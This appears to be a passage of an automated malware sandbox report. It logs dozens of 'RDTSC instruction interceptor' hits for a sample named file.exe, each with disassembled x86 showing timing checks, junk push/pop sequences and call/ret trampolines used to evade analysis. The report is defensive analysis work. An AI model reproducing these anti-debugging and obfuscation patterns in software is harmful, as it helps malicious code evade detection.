                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895C94 second address: 895C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895F9B second address: 895F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895F9F second address: 895FAC instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89796E second address: 897977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897B97 second address: 897BB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E9917DE2Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F5E9917DE28h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897BB3 second address: 897BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897BB8 second address: 897BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E9917DE26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e add dword ptr [ebp+122D1B42h], eax 0x00000014 push 00000000h 0x00000016 movsx edi, bx 0x00000019 call 00007F5E9917DE29h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007F5E9917DE26h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897BE3 second address: 897BF0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897BF0 second address: 897C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F5E9917DE2Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C0F second address: 897C30 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007F5E987E4116h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C30 second address: 897C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jns 00007F5E9917DE26h 0x0000000c pop edx 0x0000000d popad 0x0000000e pop eax 0x0000000f sub dword ptr [ebp+122D198Ch], edi 0x00000015 push 00000003h 0x00000017 mov dword ptr [ebp+122D198Ch], edx 0x0000001d push 00000000h 0x0000001f add dword ptr [ebp+122D17FFh], edx 0x00000025 push 00000003h 0x00000027 adc esi, 16B3E157h 0x0000002d call 00007F5E9917DE29h 0x00000032 push edx 0x00000033 push ecx 0x00000034 push eax 0x00000035 pop eax 0x00000036 pop ecx 0x00000037 pop edx 0x00000038 push eax 0x00000039 pushad 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C71 second address: 897C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007F5E987E411Ch 0x0000000b pop esi 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 jc 00007F5E987E411Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897C92 second address: 897C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9D55 second address: 8A9D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F5E987E411Dh 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B967D second address: 8B9682 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7610 second address: 8B7651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F5E987E4123h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jo 00007F5E987E4118h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7651 second address: 8B7657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B77AE second address: 8B77B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7A5C second address: 8B7A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7C54 second address: 8B7C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4120h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B809E second address: 8B80D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F5E9917DE4Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F5E9917DE26h 0x00000018 jmp 00007F5E9917DE2Dh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8649 second address: 8B8657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F5E987E4116h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889AEF second address: 889AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B903C second address: 8B9069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E987E4116h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5E987E4122h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F5E987E4116h 0x0000001a jno 00007F5E987E4116h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9069 second address: 8B906F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B906F second address: 8B9078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD0AB second address: 8BD0B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E9917DE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB72C second address: 8BB736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB736 second address: 8BB73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BBFFD second address: 8BC001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC001 second address: 8BC013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC013 second address: 8BC019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC019 second address: 8BC04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5E9917DE2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F5E9917DE26h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC04E second address: 8BC052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD191 second address: 8BD197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD197 second address: 8BD1E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F5E987E4121h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E987E4122h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD1E2 second address: 8BD1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3C9A second address: 8C3CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F5E987E4123h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3CB8 second address: 8C3CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3CCC second address: 8C3CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3E21 second address: 8C3E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5E9917DE33h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7B66 second address: 8C7BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E987E4116h 0x0000000a popad 0x0000000b add dword ptr [esp], 1E6CAA72h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F5E987E4118h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push EDFDFEDAh 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F5E987E411Ah 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7BA5 second address: 8C7BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C871A second address: 8C8720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8AD2 second address: 8C8AE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5E9917DE26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8AE3 second address: 8C8AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B90 second address: 8C8B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B94 second address: 8C8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8B9A second address: 8C8B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8CB6 second address: 8C8CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA5EE second address: 8CA5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB9CD second address: 8CB9D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CB9D2 second address: 8CBA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5E9917DE28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov esi, 54D03C37h 0x00000029 push 00000000h 0x0000002b mov esi, 78A01A2Ch 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F5E9917DE28h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122D21BCh] 0x00000052 or edi, dword ptr [ebp+124546C0h] 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a jl 00007F5E9917DE3Bh 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBA58 second address: 8CBA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBA5C second address: 8CBA60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CBA60 second address: 8CBA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCDFA second address: 8CCE04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CE5FD second address: 8CE602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CE602 second address: 8CE608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0617 second address: 8D0638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E987E4129h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0638 second address: 8D0642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884999 second address: 8849CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F5E987E4122h 0x00000010 jmp 00007F5E987E411Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E987E4122h 0x0000001c jg 00007F5E987E4116h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8849CF second address: 8849D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1663 second address: 8D166C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D166C second address: 8D1670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1670 second address: 8D1674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2818 second address: 8D281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D281C second address: 8D2833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4123h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2833 second address: 8D2846 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E9917DE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D47B8 second address: 8D47BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6635 second address: 8D663B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D575C second address: 8D5760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D663B second address: 8D66D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F5E9917DE2Ch 0x00000010 mov edi, 61FD35C5h 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F5E9917DE28h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 pushad 0x00000033 jl 00007F5E9917DE26h 0x00000039 stc 0x0000003a popad 0x0000003b jmp 00007F5E9917DE33h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F5E9917DE28h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push esi 0x0000005f jmp 00007F5E9917DE36h 0x00000064 pop esi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5760 second address: 8D5766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6800 second address: 8D680A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D8739 second address: 8D873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D873F second address: 8D87E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E9917DE2Dh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5E9917DE38h 0x00000012 push edx 0x00000013 jmp 00007F5E9917DE31h 0x00000018 pop edx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F5E9917DE28h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov ebx, dword ptr [ebp+122D339Eh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F5E9917DE28h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 push 00000000h 0x00000059 mov edi, dword ptr [ebp+122D294Eh] 0x0000005f push eax 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F5E9917DE2Fh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D975A second address: 8D9775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E4127h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9775 second address: 8D9779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9779 second address: 8D979C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5E987E4125h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D979C second address: 8D97A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D97A1 second address: 8D9804 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F5E987E4118h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F5E987E4118h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jg 00007F5E987E4119h 0x00000045 push 00000000h 0x00000047 adc ebx, 37B386C5h 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F5E987E4116h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9804 second address: 8D9808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA7CC second address: 8DA7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
